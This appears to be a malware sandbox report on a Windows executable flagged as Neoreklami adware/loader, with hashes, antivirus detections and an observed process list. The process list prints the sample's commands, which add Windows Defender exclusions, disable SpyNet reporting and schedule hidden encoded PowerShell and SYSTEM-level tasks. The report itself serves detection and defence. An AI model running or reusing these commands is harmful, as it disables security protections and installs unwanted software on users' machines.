83cf1a0e95e1ea5a5780f49aab15c1aba377d4d280aa8fc3a7f8cc9a0b4f3e22
Classification: Malicious
83cf1a0e95e1ea5a5780f49aab15c1aba377d4d280aa8fc3a7f8cc9a0b4f3e22 is a malicious file sample. Reported by 2 threat sources, last seen 2026-09-02.
Detection summary
- 66 antivirus detections
- 1 IDS alerts
- 16 processes observed
- 2 contacted hosts
- 1 DNS requests
Blacklist sightings
| Description | Source | First seen | Last seen | Labels | MITRE ATT&CK |
|---|---|---|---|---|---|
| Generic Malware | Hybrid-Analysis | 2025-05-11 05:45:06 | 2026-09-02 20:45:06 | malicious-activity | |
| Adware.Neoreklami | MalwareBazaar Abuse.ch | 2023-11-03 11:53:06 | 2023-11-03 11:53:06 | malicious-activity |
Tags
evasive maliciousSample information
- Filenames
- 83cf1a0e95e1ea5a5780f49aab15c1aba377d4d280aa8fc3a7f8cc9a0b4f3e22, 83cf1a0e95e1ea5a5780f49aab15c1aba377d4d280aa8fc3a7f8cc9a0b4f3e22.exe, file
- File type
- application/x-dosexec
- Size
- 7522327 bytes
- MD5
8e03fddc51dbea3d46962e2b27810f3d- SHA-1
90ccd0faef0ab7225a1f879fd818d7659b79826c- SHA-256
83cf1a0e95e1ea5a5780f49aab15c1aba377d4d280aa8fc3a7f8cc9a0b4f3e22- First indexed
- 2023-11-03 12:18:31
- Last updated
- 2026-09-02 20:45:06
Antivirus detections
| Engine | Detection |
|---|---|
| ALYac | Trojan.GenericKD.70201025 |
| APEX | Malicious |
| AVG | Win32:Evo-gen [Trj] |
| AhnLab-V3 | Trojan/Win.Generic.C5537399 |
| Alibaba | Trojan:Win32/Lolbas.923ef629 |
| Antiy-AVL | GrayWare[AdWare]/Win32.Neoreklami |
| Arcabit | Trojan.Generic.D42F2EC1 |
| Avast | Win32:Evo-gen [Trj] |
| Avira | TR/AD.Nekark.zxslv |
| BitDefender | Trojan.GenericKD.70201025 |
| BitDefenderTheta | Gen:NN.ZexaF.36744.@R0@am5lReoi |
| Bkav | W32.AIDetectMalware |
| CrowdStrike | win/malicious_confidence_100% (W) |
| Cylance | unsafe |
| Cynet | Malicious (score: 100) |
| DeepInstinct | MALICIOUS |
| DrWeb | Trojan.Siggen21.59626 |
| ESET-NOD32 | a variant of Win32/Adware.Neoreklami.OD |
| Elastic | malicious (high confidence) |
| Emsisoft | Trojan.GenericKD.70201025 (B) |
| F-Secure | Adware.ADWARE/Neoreklami.axzcb |
| FireEye | Trojan.GenericKD.70201025 |
| Fortinet | Adware/Neoreklami |
| GData | Win32.Trojan.PSE.BGYAEY |
| Detected | |
| Ikarus | PUA.Neoreklami |
| Kaspersky | Trojan.Win32.Lolbas.yv |
| Kingsoft | Win32.Trojan.Lolbas.a |
| Lionic | Trojan.Win32.Neoreklami.4!c |
| MAX | malware (ai score=81) |
| Malwarebytes | Generic.Malware.AI.DDS |
| MaxSecure | Trojan.Malware.121218.susgen |
| McAfee | Artemis!8E03FDDC51DB |
| MicroWorld-eScan | Trojan.GenericKD.70201025 |
| Microsoft | Program:Win32/Wacapew.C!ml |
| Rising | Adware.Neoreklami!1.ABC4 (CLASSIC) |
| Sangfor | Adware.Win32.Neoreklami.Vxqx |
| SentinelOne | Static AI - Suspicious SFX |
| Skyhigh | BehavesLike.Win32.Neoreklami.wc |
| Sophos | Generic Reputation PUA (PUA) |
| Symantec | ML.Attribute.HighConfidence |
| Tencent | Win32.Trojan.Lolbas.Hajl |
| Trapmine | malicious.moderate.ml.score |
| TrendMicro | Trojan.Win32.PRIVATELOADER.YXDKCZ |
| TrendMicro-HouseCall | Trojan.Win32.PRIVATELOADER.YXDKCZ |
| VBA32 | Adware.Neoreklami |
| VIPRE | Trojan.GenericKD.70201025 |
| Varist | W32/ABAdware.WYOC-8601 |
| VirIT | Trojan.Win32.Genus.UAV |
| Webroot | W32.Adware.Gen |
| ZoneAlarm | Trojan.Win32.Lolbas.yv |
| MicroWorld-eScan | Gen:Variant.Adware.Jaik.161234 |
| FireEye | Gen:Variant.Adware.Jaik.161234 |
| Skyhigh | BehavesLike.Win32.Dropper.wc |
| ALYac | Gen:Variant.Adware.Jaik.161234 |
| BitDefender | Gen:Variant.Adware.Jaik.161234 |
| ESET-NOD32 | a variant of Win32/Adware.Neoreklami.NN |
| Kaspersky | UDS:Trojan.Win32.Lolbas |
| Emsisoft | Gen:Variant.Adware.Jaik.161234 (B) |
| VIPRE | Gen:Variant.Adware.Jaik.161234 |
| Microsoft | Trojan:Win32/Wacatac.B!ml |
| Arcabit | Trojan.Adware.Jaik.D275D2 |
| ZoneAlarm | UDS:Trojan.Win32.Lolbas |
| SentinelOne | Static AI - Malicious SFX |
| BitDefenderTheta | Gen:NN.ZexaF.36792.@R0@am5lReoi |
| CrowdStrike | win/grayware_confidence_90% (D) |
Network contacts
DNS requests
Process list
| Name | Command line |
|---|---|
| 83cf1a0e95e1ea5a5780f49aab15c1aba377d4d280aa8fc3a7f8cc9a0b4f3e22.exe | |
| Install.exe | .\Install.exe |
| Install.exe | .\Install.exe /hMDdidkmleT "525403" /S |
| forfiles.exe | /p %WINDIR%\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&" |
| cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
| reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
| reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
| forfiles.exe | /p %WINDIR%\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&" |
| cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
| reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
| reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
| schtasks.exe | schtasks /CREATE /TN "gWfNNyCQu" /SC once /ST 01:17:47 /F /RU "%OSUSER%" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
| schtasks.exe | schtasks /run /I /tn "gWfNNyCQu" |
| schtasks.exe | schtasks /DELETE /F /TN "gWfNNyCQu" |
| schtasks.exe | schtasks /CREATE /TN "bZoATSYyjhjYXlzouA" /SC once /ST 05:38:00 /RU "SYSTEM" /TR "\"%TEMP%\GuirZeOAGzaPzLfuG\vtwNuEXneIRBjah\yFEaXIx.exe\" md /uNsite_idaOQ 525403 /S" /V1 /F |
| schtasks.exe | schtasks /run /I /tn "bZoATSYyjhjYXlzouA" |